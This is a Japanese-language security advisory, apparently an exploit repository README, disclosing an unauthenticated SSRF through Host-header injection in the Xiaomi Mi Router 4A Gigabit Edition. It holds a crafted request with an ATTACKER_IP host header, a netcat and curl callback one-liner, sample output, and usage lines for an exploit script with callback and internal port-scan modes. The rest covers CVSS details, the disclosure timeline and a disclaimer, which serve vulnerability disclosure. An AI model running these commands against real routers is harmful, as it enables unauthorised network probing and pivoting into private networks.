
Xiaomi Mi Router 4A Gigabit Edition (ファームウェア 3.0.24) における Host Header Injection を介した認証不要の SSRF — CVE-2026-26898
Xiaomi Mi Router 4A Gigabit Editionには、Server-Side Request Forgery(SSRF)の脆弱性が存在します。ルーターのWebインターフェースはHTTP Hostヘッダーを検証しないため、認証されていない攻撃者がルーターに任意のアウトバウンドTCP接続を強制できます。
| フィールド | 値 |
|---|---|
| デバイス | Xiaomi Mi Router 4A Gigabit Edition |
| ファームウェア | 3.0.24 (International) |
| CVE | CVE-2026-26898 (係争中 — 以下の開示状況を参照) |
| CWE | CWE-918 (Server-Side Request Forgery) |
| CVSS 3.1 | 8.6 (High) — 研究者評価、ベンダーは重大性に異議あり |
ステータス: ベンダーにより係争中 — この報告はXiaomiに_受理されませんでした_。
CVE-2026-26898はここでは追跡目的のみで使用されています。ベンダーによる係争を考慮すると、ベンダー確認済みではなく係争中/未確認として扱われるべきです。
GET /cgi-bin/luci/api/xqsystem/login HTTP/1.1
Host: <ATTACKER_IP>:<PORT>

python3 xiaomi_ssrf_exploit.py --target 192.168.31.1 --check
[*] Checking vulnerability on 192.168.31.1...
[*] Local IP: 192.168.31.235
[*] Test Port: 44444
[+] VULNERABLE! Router connected back to 192.168.31.235:44444
# Terminal 1: Start listener
nc -l 4444
# Terminal 2: Send malicious request
curl -H "Host: YOUR_IP:4444" "http://192.168.31.1/cgi-bin/luci/api/xqsystem/login"
| ファイル | 説明 |
|---|---|
xiaomi_ssrf_exploit.py | 複数モードを持つ完全なエクスプロイト |
# Check if vulnerable
python3 xiaomi_ssrf_exploit.py --target ROUTER_IP --check
# Callback mode
python3 xiaomi_ssrf_exploit.py --target ROUTER_IP --callback YOUR_IP --port 4444
# Port scanner
python3 xiaomi_ssrf_exploit.py --target ROUTER_IP --scan TARGET_IP --ports 22,23,80,443
| 日付 | イベント |
|---|---|
| 2026-01-15 | 脆弱性を発見、PoCを開発 |
| 2026-01-16 | HackerOne(#3513458)を介してXiaomiに報告 |
| 2026-01-23 | Xiaomiが報告を情報提供としてクローズ(低リスク、修正しない) |
| 2026-06-03 | 公開アドバイザリを公開(このリポジトリ)— ベンダー係争中、未パッチ |
このエクスプロイトは教育および公認されたセキュリティテスト目的のみで提供されます。コンピュータシステムへの無許可アクセスは違法です。
Ahmet Mersin
🌐 ahmetmersin.com
🐙 @iwallplace